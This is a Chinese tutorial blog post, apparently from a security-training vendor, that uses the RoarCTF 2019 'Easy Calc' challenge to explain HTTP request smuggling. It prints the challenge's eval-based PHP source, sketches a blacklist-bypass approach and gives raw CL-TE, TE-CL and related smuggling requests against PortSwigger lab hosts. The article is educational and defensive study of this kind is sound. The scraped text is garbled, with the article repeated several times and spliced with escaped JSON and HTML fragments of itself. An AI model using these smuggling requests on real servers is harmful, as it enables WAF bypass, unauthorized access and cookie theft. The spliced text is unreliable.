当前位置: 首页 >技术干货>新闻详情

从一道CTF题到HTTP走私攻击

2021-11-03 10:40
1471

前言

最近在复盘之前做过的CTF题时,发现有一道比较有趣。是用的PHP 字符串解析特性Bypass的思路,但这道题远不止于此,还有另一种解法,HTTP请求走私攻击。想和作者一样做一些CTF相关题目,可以在蚁景网安实验室CTF实验室进行一些解题操作,实战靶场级的体验!

RoarCTF 2019 Easy Calc

先看下源码:

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\
,'\\','\^'];
       foreach ($blacklist as $blackitem) {
               if (preg_match('/' . $blackitem . '/m', $str)) {
                       die("what are you want to do?");
              }
      }
       eval('echo '.$str.';');
}
?>

用解析特性来做的话,大概思路是这样的:变量前加空格绕WAF,用scandir()和chr()看目录下有啥文件,file_get_contents读取flag文件。用解法二做的话,不需要考虑空格绕waf的问题,后面做法一致:

图1.png

到这里估计很多人跟我当时一样懵圈了,又返回400又拿到了flag。这里先留个悬念

什么是HTTP请求走私

HTTP请求走私这一攻击方式很特殊,它不像其他的Web攻击方式那样比较直观,它更多的是在复杂网络环境下,不同的服务器对RFC标准实现的方式不同,程度不同。在现阶段广泛使用的HTTP1.1协议,提供了两种不同方式来指定请求的结束位置,它们是Content-Length标头和Transfer-Encoding标头,Content-Length标头简单明了,它以字节为单位指定消息内容体的长度。

Transfer-Encoding标头用于指定消息体使用分块编码(ChunkedEncode),也就是说消息报文由一个或多个数据块组成,每个数据块大小以字节为单位(十六进制表示) 衡量,后跟换行符,然后是块内容,最重要的是:整个消息体以大小为0的块结束,也就是说解析遇到0数据块就结束。

这就导致如果我们使用如反向代理一类的服务器(后面简称为前端服务器)时,前端和后端系统就请求之间的边界没有达成一致的话,就会产生HTTP走私攻击,很容易使得攻击者绕过安全控制,未经授权访问敏感数据,并直接危害其他应用程序用户。

如何实现HTTP请求走私攻击

当我们向代理服务器发送一个比较模糊的HTTP请求时,由于两者服务器的实现方式不同,可能代理服务器认为这是一个HTTP请求,然后将其转发给了后端的源站服务器,但源站服务器经过解析处理后,只认为其中的一部分为正常请求,剩下的那一部分,就算是走私的请求,当该部分对正常用户的请求造成了影响之后,就实现了HTTP走私攻击。

CL不为0时

该情况主要针对不含请求体的HTTP请求,主要以GET请求为主。假如我们的前端服务器允许GET请求携带请求体,但后端服务器不允许GET请求携带请求体时,会直接忽略掉Content-Length头,进而造成请求走私。

GET / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length : 51\r\n
\r\n
GET / HTTP/1.1\r\n
Host: example.com\r\n
attack: 1\r\n
hhh:

这个请求对于前端服务器来说,是一个正常的请求,但转发到后端时,因为后端不认Content-Length头,所以这个请求就变成了两个请求,当下一个请求到达时,就会拼接到上一个请求中

GET / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length : 51\r\n
\r\n
GET / HTTP/1.1\r\n
Host: example.com\r\n
attack: 1\r\n
hhh: GET / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length : 51\r\n

这会存在什么危害呢?因为HTTP为无状态协议,并且很多网站使用Cookie来对用户状态进行标识,当我们在第二个数据包构造如删除用户、转账、修改密码等敏感操作的时候,起到盗取其他用户cookie的作用。

CL-TE

CL-TE,即当我们发送内含两个请求头的请求包时,前端服务器只处理Content-Length,而后端服务器忽略Content-Length头,只处理Transfer-Encoding请求头。这里用Burpsuite的官方靶场进行演示:

POST / HTTP/1.1
Host: ac911f721f9ee241c01763ef008600f8.web-security-academy.net
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="94", "Google Chrome";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=kSvNgyDye0o1097OwEFsKJD9eu6tpo4k
Content-Length: 6
Transfer-Encoding: chunked

0

A

当我们用Burp两次重放该数据包,会得到返回结果:

图2.png

解释一下为什么Content-Length的长度是6,因为Burp把\r\n给直接解释成换行了,实际请求体应该是这样:

0\r\n
\r\n
A

后端服务器读到0\r\n\r\n就会以为这个数据包已经读完了,最后的字符A会放到下一个请求解析。

TE-CL

TE-CL,即当我们发送内含两个请求头的请求包时,前端服务器只处理Transfer-Encoding,而后端服务器忽略Transfer-Encoding头,只处理Content-Length请求头:

POST / HTTP/1.1
Host: acae1fe41e622a9bc0c7189700950000.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cookie: session=VfTG4xpWeu1NboBIfCyqsHiWb8UjNDGZ
Content-length: 4
Transfer-Encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

前端服务器对于这个请求来说,会处理Transfer-Encoding,读到0\r\n\r\n的时候,认为是读取完毕了,就是把他当作一个完整请求,但后端服务器只认Content-length: 4,这就导致GPOST成为了一个新的请求。

图3.png

CL-CL

CL-CL即两个Content-length,当两者的值不同的时候,会返回400错误。但如果服务器不严格按照规范,就会发生前端服务器按照第一个Content-length头的值处理,后端服务器按照第二个Content-length头的值进行处理

回到最初

因为我们的payload里有两个CL头,对应CL-CL的情形,这时候前后端都会各收到一次我们的请求包,因为服务器的不规范,虽然返回400错误,但是请求依旧发给了后端服务器,造成了WAF的绕过问题。

蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~

扫码咨询客服了解招生最新内容和活动

🎈网安学院推荐课程:Web安全工程师特训班Python全栈安全开发特训班应急响应安全工程师特训班
 CTF-Reverse实战技能特训班CTF-WEB实战技能特训班 CTF-PWN实战技能特训班CTF-MISC实战技能特训班 SRC漏洞挖掘实战班HVV大师课
,'\\\\','\\^'];\r\n        foreach ($blacklist as $blackitem) {\r\n                if (preg_match('\u002F' . $blackitem . '\u002Fm', $str)) {\r\n                        die(\"what are you want to do?\");\r\n               }\r\n       }\r\n        eval('echo '.$str.';');\r\n}\r\n?\u003E \r\n\r\n用解析特性来做的话,大概思路是这样的:变量前加空格绕WAF,用scandir()和chr()看目录下有啥文件,file_get_contents读取flag文件。用解法二做的话,不需要考虑空格绕waf的问题,后面做法一致:\r\n\r\n\r\n到这里估计很多人跟我当时一样懵圈了,又返回400又拿到了flag。这里先留个悬念\r\n\r\n什么是HTTP请求走私\r\n\r\nHTTP请求走私这一攻击方式很特殊,它不像其他的Web攻击方式那样比较直观,它更多的是在复杂网络环境下,不同的服务器对RFC标准实现的方式不同,程度不同。在现阶段广泛使用的HTTP1.1协议,提供了两种不同方式来指定请求的结束位置,它们是Content-Length标头和Transfer-Encoding标头,Content-Length标头简单明了,它以字节为单位指定消息内容体的长度。\r\n\r\nTransfer-Encoding标头用于指定消息体使用分块编码(ChunkedEncode),也就是说消息报文由一个或多个数据块组成,每个数据块大小以字节为单位(十六进制表示) 衡量,后跟换行符,然后是块内容,最重要的是:整个消息体以大小为0的块结束,也就是说解析遇到0数据块就结束。\r\n\r\n这就导致如果我们使用如反向代理一类的服务器(后面简称为前端服务器)时,前端和后端系统就请求之间的边界没有达成一致的话,就会产生HTTP走私攻击,很容易使得攻击者绕过安全控制,未经授权访问敏感数据,并直接危害其他应用程序用户。\r\n\r\n如何实现HTTP请求走私攻击\r\n\r\n当我们向代理服务器发送一个比较模糊的HTTP请求时,由于两者服务器的实现方式不同,可能代理服务器认为这是一个HTTP请求,然后将其转发给了后端的源站服务器,但源站服务器经过解析处理后,只认为其中的一部分为正常请求,剩下的那一部分,就算是走私的请求,当该部分对正常用户的请求造成了影响之后,就实现了HTTP走私攻击。\r\n\r\nCL不为0时\r\n\r\n该情况主要针对不含请求体的HTTP请求,主要以GET请求为主。假如我们的前端服务器允许GET请求携带请求体,但后端服务器不允许GET请求携带请求体时,会直接忽略掉Content-Length头,进而造成请求走私。\r\n\r\nGET \u002F HTTP\u002F1.1\\r\\n\r\nHost: example.com\\r\\n\r\nContent-Length : 51\\r\\n\r\n\\r\\n\r\nGET \u002F HTTP\u002F1.1\\r\\n\r\nHost: example.com\\r\\n\r\nattack: 1\\r\\n\r\nhhh: \r\n\r\n这个请求对于前端服务器来说,是一个正常的请求,但转发到后端时,因为后端不认Content-Length头,所以这个请求就变成了两个请求,当下一个请求到达时,就会拼接到上一个请求中\r\n\r\nGET \u002F HTTP\u002F1.1\\r\\n\r\nHost: example.com\\r\\n\r\nContent-Length : 51\\r\\n\r\n\\r\\n\r\nGET \u002F HTTP\u002F1.1\\r\\n\r\nHost: example.com\\r\\n\r\nattack: 1\\r\\n\r\nhhh: GET \u002F HTTP\u002F1.1\\r\\n\r\nHost: example.com\\r\\n\r\nContent-Length : 51\\r\\n\r\n\r\n这会存在什么危害呢?因为HTTP为无状态协议,并且很多网站使用Cookie来对用户状态进行标识,当我们在第二个数据包构造如删除用户、转账、修改密码等敏感操作的时候,起到盗取其他用户cookie的作用。\r\n\r\nCL-TE \r\n\r\nCL-TE,即当我们发送内含两个请求头的请求包时,前端服务器只处理Content-Length,而后端服务器忽略Content-Length头,只处理Transfer-Encoding请求头。这里用Burpsuite的官方靶场进行演示:\r\n\r\nPOST \u002F HTTP\u002F1.1\r\nHost: ac911f721f9ee241c01763ef008600f8.web-security-academy.net\r\nConnection: close\r\nCache-Control: max-age=0\r\nsec-ch-ua: \"Chromium\";v=\"94\", \"Google Chrome\";v=\"94\", \";Not A Brand\";v=\"99\"\r\nsec-ch-ua-mobile: ?0\r\nsec-ch-ua-platform: \"Windows\"\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F94.0.4606.81 Safari\u002F537.36\r\nAccept: text\u002Fhtml,application\u002Fxhtml+xml,application\u002Fxml;q=0.9,image\u002Favif,image\u002Fwebp,image\u002Fapng,*\u002F*;q=0.8,application\u002Fsigned-exchange;v=b3;q=0.9\r\nSec-Fetch-Site: none\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-User: ?1\r\nSec-Fetch-Dest: document\r\nAccept-Language: zh-CN,zh;q=0.9\r\nCookie: session=kSvNgyDye0o1097OwEFsKJD9eu6tpo4k\r\nContent-Length: 6\r\nTransfer-Encoding: chunked\r\n \r\n0\r\n \r\nA\r\n\r\n当我们用Burp两次重放该数据包,会得到返回结果:\r\n\r\n\r\n解释一下为什么Content-Length的长度是6,因为Burp把\\r\\n给直接解释成换行了,实际请求体应该是这样:\r\n\r\n0\\r\\n\r\n\\r\\n\r\nA\r\n\r\n后端服务器读到0\\r\\n\\r\\n就会以为这个数据包已经读完了,最后的字符A会放到下一个请求解析。\r\n\r\nTE-CL \r\n\r\nTE-CL,即当我们发送内含两个请求头的请求包时,前端服务器只处理Transfer-Encoding,而后端服务器忽略Transfer-Encoding头,只处理Content-Length请求头:\r\n\r\nPOST \u002F HTTP\u002F1.1\r\nHost: acae1fe41e622a9bc0c7189700950000.web-security-academy.net\r\nUser-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F94.0.4606.81 Safari\u002F537.36\r\nAccept: text\u002Fhtml,application\u002Fxhtml+xml,application\u002Fxml;q=0.9,image\u002Favif,image\u002Fwebp,image\u002Fapng,*\u002F*;q=0.8,application\u002Fsigned-exchange;v=b3;q=0.9\r\nCookie: session=VfTG4xpWeu1NboBIfCyqsHiWb8UjNDGZ\r\nContent-length: 4\r\nTransfer-Encoding: chunked\r\n \r\n5c\r\nGPOST \u002F HTTP\u002F1.1\r\nContent-Type: application\u002Fx-www-form-urlencoded\r\nContent-Length: 15\r\n \r\nx=1\r\n0\r\n \r\n \r\n\r\n前端服务器对于这个请求来说,会处理Transfer-Encoding,读到0\\r\\n\\r\\n的时候,认为是读取完毕了,就是把他当作一个完整请求,但后端服务器只认Content-length: 4,这就导致GPOST成为了一个新的请求。\r\n\r\n\r\nCL-CL\r\n\r\nCL-CL即两个Content-length,当两者的值不同的时候,会返回400错误。但如果服务器不严格按照规范,就会发生前端服务器按照第一个Content-length头的值处理,后端服务器按照第二个Content-length头的值进行处理\r\n\r\n回到最初\r\n\r\n因为我们的payload里有两个CL头,对应CL-CL的情形,这时候前后端都会各收到一次我们的请求包,因为服务器的不规范,虽然返回400错误,但是请求依旧发给了后端服务器,造成了WAF的绕过问题。",pic:"\u002Fcloud-image\u002Fnews\u002F79f1ea9e-7bee-4f35-8337-5a66adc697a5.png",openTime:"2021-11-03T10:40:28+08:00",viewsNum:1471,content:"\u003Ch2\u003E\u003Cb\u003E前言\u003C\u002Fb\u003E\u003Cbr\u003E\u003C\u002Fh2\u003E\u003Cp\u003E最近在复盘之前做过的CTF题时,发现有一道比较有趣。是用的PHP 字符串解析特性Bypass的思路,但这道题远不止于此,还有另一种解法,HTTP请求走私攻击。想和作者一样做一些CTF相关题目,可以在\u003Cspan style=\"color: rgb(65, 140, 175);\"\u003E\u003Ca href=\"\" target=\"_blank\" style=\"\"\u003E\u003C\u002Fa\u003E\u003Ca href=\"https:\u002F\u002Fwww.yijinglab.com\u002Fpages\u002FCTFLaboratory.jsp\" target=\"_blank\" ref=\"nofollow\" target=\"_blank\" \u003E蚁景网安实验室CTF实验室\u003C\u002Fa\u003E\u003C\u002Fspan\u003E进行一些解题操作,实战靶场级的体验!\u003C\u002Fp\u003E\u003Ch2\u003E\u003Cb\u003ERoarCTF 2019 Easy Calc\u003C\u002Fb\u003E\u003C\u002Fh2\u003E\u003Cp\u003E先看下源码:\u003C\u002Fp\u003E\u003Cpre\u003E\u003Ccode\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E\u003Cspan class=\"cm-operator\" style=\"box-sizing: border-box; color: rgb(152, 26, 26);\"\u003E<?\u003C\u002Fspan\u003E\u003Cspan class=\"cm-variable\" style=\"box-sizing: border-box; color: rgb(0, 0, 0);\"\u003Ephp\u003C\u002Fspan\u003E\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E\u003Cspan class=\"cm-builtin\" style=\"box-sizing: border-box; color: rgb(51, 0, 170);\"\u003Eerror_reporting\u003C\u002Fspan\u003E(\u003Cspan class=\"cm-number\" style=\"box-sizing: border-box; color: rgb(17, 102, 68);\"\u003E0\u003C\u002Fspan\u003E);\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E\u003Cspan class=\"cm-keyword\" style=\"box-sizing: border-box; color: rgb(119, 0, 136);\"\u003Eif\u003C\u002Fspan\u003E(\u003Cspan class=\"cm-operator\" style=\"box-sizing: border-box; color: rgb(152, 26, 26);\"\u003E!\u003C\u002Fspan\u003E\u003Cspan class=\"cm-keyword\" style=\"box-sizing: border-box; color: rgb(119, 0, 136);\"\u003Eisset\u003C\u002Fspan\u003E(\u003Cspan class=\"cm-variable-2\" style=\"box-sizing: border-box; color: rgb(0, 85, 170);\"\u003E$_GET\u003C\u002Fspan\u003E[\u003Cspan class=\"cm-string\" style=\"box-sizing: border-box; color: rgb(170, 17, 17);\"\u003E'num'\u003C\u002Fspan\u003E])){\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E    \u003Cspan class=\"cm-builtin\" style=\"box-sizing: border-box; color: rgb(51, 0, 170);\"\u003Eshow_source\u003C\u002Fspan\u003E(\u003Cspan class=\"cm-atom\" style=\"box-sizing: border-box; color: rgb(34, 17, 153);\"\u003E__FILE__\u003C\u002Fspan\u003E);\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E}\u003Cspan class=\"cm-keyword\" style=\"box-sizing: border-box; color: rgb(119, 0, 136);\"\u003Eelse\u003C\u002Fspan\u003E{\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E        \u003Cspan class=\"cm-variable-2\" style=\"box-sizing: border-box; color: rgb(0, 85, 170);\"\u003E$str\u003C\u002Fspan\u003E \u003Cspan class=\"cm-operator\" style=\"box-sizing: border-box; color: rgb(152, 26, 26);\"\u003E=\u003C\u002Fspan\u003E \u003Cspan class=\"cm-variable-2\" style=\"box-sizing: border-box; color: rgb(0, 85, 170);\"\u003E$_GET\u003C\u002Fspan\u003E[\u003Cspan class=\"cm-string\" style=\"box-sizing: border-box; color: rgb(170, 17, 17);\"\u003E'num'\u003C\u002Fspan\u003E];\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E        \u003Cspan class=\"cm-variable-2\" style=\"box-sizing: border-box; color: rgb(0, 85, 170);\"\u003E$blacklist\u003C\u002Fspan\u003E \u003Cspan class=\"cm-operator\" style=\"box-sizing: border-box; color: rgb(152, 26, 26);\"\u003E=\u003C\u002Fspan\u003E [\u003Cspan class=\"cm-string\" style=\"box-sizing: border-box; color: rgb(170, 17, 17);\"\u003E' '\u003C\u002Fspan\u003E, \u003Cspan class=\"cm-string\" style=\"box-sizing: border-box; color: rgb(170, 17, 17);\"\u003E'\\t'\u003C\u002Fspan\u003E, \u003Cspan class=\"cm-string\" style=\"box-sizing: border-box; color: rgb(170, 17, 17);\"\u003E'\\r'\u003C\u002Fspan\u003E, \u003Cspan class=\"cm-string\" style=\"box-sizing: border-box; color: rgb(170, 17, 17);\"\u003E'\\n'\u003C\u002Fspan\u003E,\u003Cspan class=\"cm-string\" style=\"box-sizing: border-box; color: rgb(170, 17, 17);\"\u003E'\\''\u003C\u002Fspan\u003E, \u003Cspan class=\"cm-string\" style=\"box-sizing: border-box; color: rgb(170, 17, 17);\"\u003E'\"'\u003C\u002Fspan\u003E, \u003Cspan class=\"cm-string\" style=\"box-sizing: border-box; color: rgb(170, 17, 17);\"\u003E'`'\u003C\u002Fspan\u003E, \u003Cspan class=\"cm-string\" style=\"box-sizing: border-box; color: rgb(170, 17, 17);\"\u003E'\\['\u003C\u002Fspan\u003E, \u003Cspan class=\"cm-string\" style=\"box-sizing: border-box; color: rgb(170, 17, 17);\"\u003E'\\]'\u003C\u002Fspan\u003E,\u003Cspan class=\"cm-string\" style=\"box-sizing: border-box; color: rgb(170, 17, 17);\"\u003E'\\
当前位置: 首页 >技术干货>新闻详情

从一道CTF题到HTTP走私攻击

2021-11-03 10:40
1471

前言

最近在复盘之前做过的CTF题时,发现有一道比较有趣。是用的PHP 字符串解析特性Bypass的思路,但这道题远不止于此,还有另一种解法,HTTP请求走私攻击。想和作者一样做一些CTF相关题目,可以在蚁景网安实验室CTF实验室进行一些解题操作,实战靶场级的体验!

RoarCTF 2019 Easy Calc

先看下源码:

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\
,'\\','\^'];
       foreach ($blacklist as $blackitem) {
               if (preg_match('/' . $blackitem . '/m', $str)) {
                       die("what are you want to do?");
              }
      }
       eval('echo '.$str.';');
}
?>

用解析特性来做的话,大概思路是这样的:变量前加空格绕WAF,用scandir()和chr()看目录下有啥文件,file_get_contents读取flag文件。用解法二做的话,不需要考虑空格绕waf的问题,后面做法一致:

图1.png

到这里估计很多人跟我当时一样懵圈了,又返回400又拿到了flag。这里先留个悬念

什么是HTTP请求走私

HTTP请求走私这一攻击方式很特殊,它不像其他的Web攻击方式那样比较直观,它更多的是在复杂网络环境下,不同的服务器对RFC标准实现的方式不同,程度不同。在现阶段广泛使用的HTTP1.1协议,提供了两种不同方式来指定请求的结束位置,它们是Content-Length标头和Transfer-Encoding标头,Content-Length标头简单明了,它以字节为单位指定消息内容体的长度。

Transfer-Encoding标头用于指定消息体使用分块编码(ChunkedEncode),也就是说消息报文由一个或多个数据块组成,每个数据块大小以字节为单位(十六进制表示) 衡量,后跟换行符,然后是块内容,最重要的是:整个消息体以大小为0的块结束,也就是说解析遇到0数据块就结束。

这就导致如果我们使用如反向代理一类的服务器(后面简称为前端服务器)时,前端和后端系统就请求之间的边界没有达成一致的话,就会产生HTTP走私攻击,很容易使得攻击者绕过安全控制,未经授权访问敏感数据,并直接危害其他应用程序用户。

如何实现HTTP请求走私攻击

当我们向代理服务器发送一个比较模糊的HTTP请求时,由于两者服务器的实现方式不同,可能代理服务器认为这是一个HTTP请求,然后将其转发给了后端的源站服务器,但源站服务器经过解析处理后,只认为其中的一部分为正常请求,剩下的那一部分,就算是走私的请求,当该部分对正常用户的请求造成了影响之后,就实现了HTTP走私攻击。

CL不为0时

该情况主要针对不含请求体的HTTP请求,主要以GET请求为主。假如我们的前端服务器允许GET请求携带请求体,但后端服务器不允许GET请求携带请求体时,会直接忽略掉Content-Length头,进而造成请求走私。

GET / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length : 51\r\n
\r\n
GET / HTTP/1.1\r\n
Host: example.com\r\n
attack: 1\r\n
hhh:

这个请求对于前端服务器来说,是一个正常的请求,但转发到后端时,因为后端不认Content-Length头,所以这个请求就变成了两个请求,当下一个请求到达时,就会拼接到上一个请求中

GET / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length : 51\r\n
\r\n
GET / HTTP/1.1\r\n
Host: example.com\r\n
attack: 1\r\n
hhh: GET / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length : 51\r\n

这会存在什么危害呢?因为HTTP为无状态协议,并且很多网站使用Cookie来对用户状态进行标识,当我们在第二个数据包构造如删除用户、转账、修改密码等敏感操作的时候,起到盗取其他用户cookie的作用。

CL-TE

CL-TE,即当我们发送内含两个请求头的请求包时,前端服务器只处理Content-Length,而后端服务器忽略Content-Length头,只处理Transfer-Encoding请求头。这里用Burpsuite的官方靶场进行演示:

POST / HTTP/1.1
Host: ac911f721f9ee241c01763ef008600f8.web-security-academy.net
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="94", "Google Chrome";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=kSvNgyDye0o1097OwEFsKJD9eu6tpo4k
Content-Length: 6
Transfer-Encoding: chunked

0

A

当我们用Burp两次重放该数据包,会得到返回结果:

图2.png

解释一下为什么Content-Length的长度是6,因为Burp把\r\n给直接解释成换行了,实际请求体应该是这样:

0\r\n
\r\n
A

后端服务器读到0\r\n\r\n就会以为这个数据包已经读完了,最后的字符A会放到下一个请求解析。

TE-CL

TE-CL,即当我们发送内含两个请求头的请求包时,前端服务器只处理Transfer-Encoding,而后端服务器忽略Transfer-Encoding头,只处理Content-Length请求头:

POST / HTTP/1.1
Host: acae1fe41e622a9bc0c7189700950000.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cookie: session=VfTG4xpWeu1NboBIfCyqsHiWb8UjNDGZ
Content-length: 4
Transfer-Encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

前端服务器对于这个请求来说,会处理Transfer-Encoding,读到0\r\n\r\n的时候,认为是读取完毕了,就是把他当作一个完整请求,但后端服务器只认Content-length: 4,这就导致GPOST成为了一个新的请求。

图3.png

CL-CL

CL-CL即两个Content-length,当两者的值不同的时候,会返回400错误。但如果服务器不严格按照规范,就会发生前端服务器按照第一个Content-length头的值处理,后端服务器按照第二个Content-length头的值进行处理

回到最初

因为我们的payload里有两个CL头,对应CL-CL的情形,这时候前后端都会各收到一次我们的请求包,因为服务器的不规范,虽然返回400错误,但是请求依旧发给了后端服务器,造成了WAF的绕过问题。

蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~

扫码咨询客服了解招生最新内容和活动

🎈网安学院推荐课程:Web安全工程师特训班Python全栈安全开发特训班应急响应安全工程师特训班
 CTF-Reverse实战技能特训班CTF-WEB实战技能特训班 CTF-PWN实战技能特训班CTF-MISC实战技能特训班 SRC漏洞挖掘实战班HVV大师课
\u003C\u002Fspan\u003E,\u003Cspan class=\"cm-string\" style=\"box-sizing: border-box; color: rgb(170, 17, 17);\"\u003E'\\\\'\u003C\u002Fspan\u003E,\u003Cspan class=\"cm-string\" style=\"box-sizing: border-box; color: rgb(170, 17, 17);\"\u003E'\\^'\u003C\u002Fspan\u003E];\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E        \u003Cspan class=\"cm-keyword\" style=\"box-sizing: border-box; color: rgb(119, 0, 136);\"\u003Eforeach\u003C\u002Fspan\u003E (\u003Cspan class=\"cm-variable-2\" style=\"box-sizing: border-box; color: rgb(0, 85, 170);\"\u003E$blacklist\u003C\u002Fspan\u003E \u003Cspan class=\"cm-keyword\" style=\"box-sizing: border-box; color: rgb(119, 0, 136);\"\u003Eas\u003C\u002Fspan\u003E \u003Cspan class=\"cm-variable-2\" style=\"box-sizing: border-box; color: rgb(0, 85, 170);\"\u003E$blackitem\u003C\u002Fspan\u003E) {\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E                \u003Cspan class=\"cm-keyword\" style=\"box-sizing: border-box; color: rgb(119, 0, 136);\"\u003Eif\u003C\u002Fspan\u003E (\u003Cspan class=\"cm-builtin\" style=\"box-sizing: border-box; color: rgb(51, 0, 170);\"\u003Epreg_match\u003C\u002Fspan\u003E(\u003Cspan class=\"cm-string\" style=\"box-sizing: border-box; color: rgb(170, 17, 17);\"\u003E'\u002F'\u003C\u002Fspan\u003E . \u003Cspan class=\"cm-variable-2\" style=\"box-sizing: border-box; color: rgb(0, 85, 170);\"\u003E$blackitem\u003C\u002Fspan\u003E . \u003Cspan class=\"cm-string\" style=\"box-sizing: border-box; color: rgb(170, 17, 17);\"\u003E'\u002Fm'\u003C\u002Fspan\u003E, \u003Cspan class=\"cm-variable-2\" style=\"box-sizing: border-box; color: rgb(0, 85, 170);\"\u003E$str\u003C\u002Fspan\u003E)) {\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E                        \u003Cspan class=\"cm-keyword\" style=\"box-sizing: border-box; color: rgb(119, 0, 136);\"\u003Edie\u003C\u002Fspan\u003E(\u003Cspan class=\"cm-string\" style=\"box-sizing: border-box; color: rgb(170, 17, 17);\"\u003E\"what are you want to do?\"\u003C\u002Fspan\u003E);\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E               }\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E       }\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E        \u003Cspan class=\"cm-keyword\" style=\"box-sizing: border-box; color: rgb(119, 0, 136);\"\u003Eeval\u003C\u002Fspan\u003E(\u003Cspan class=\"cm-string\" style=\"box-sizing: border-box; color: rgb(170, 17, 17);\"\u003E'echo '\u003C\u002Fspan\u003E.\u003Cspan class=\"cm-variable-2\" style=\"box-sizing: border-box; color: rgb(0, 85, 170);\"\u003E$str\u003C\u002Fspan\u003E.\u003Cspan class=\"cm-string\" style=\"box-sizing: border-box; color: rgb(170, 17, 17);\"\u003E';'\u003C\u002Fspan\u003E);\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E}\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E\u003Cspan class=\"cm-operator\" style=\"box-sizing: border-box; color: rgb(152, 26, 26);\"\u003E?>\u003C\u002Fspan\u003E 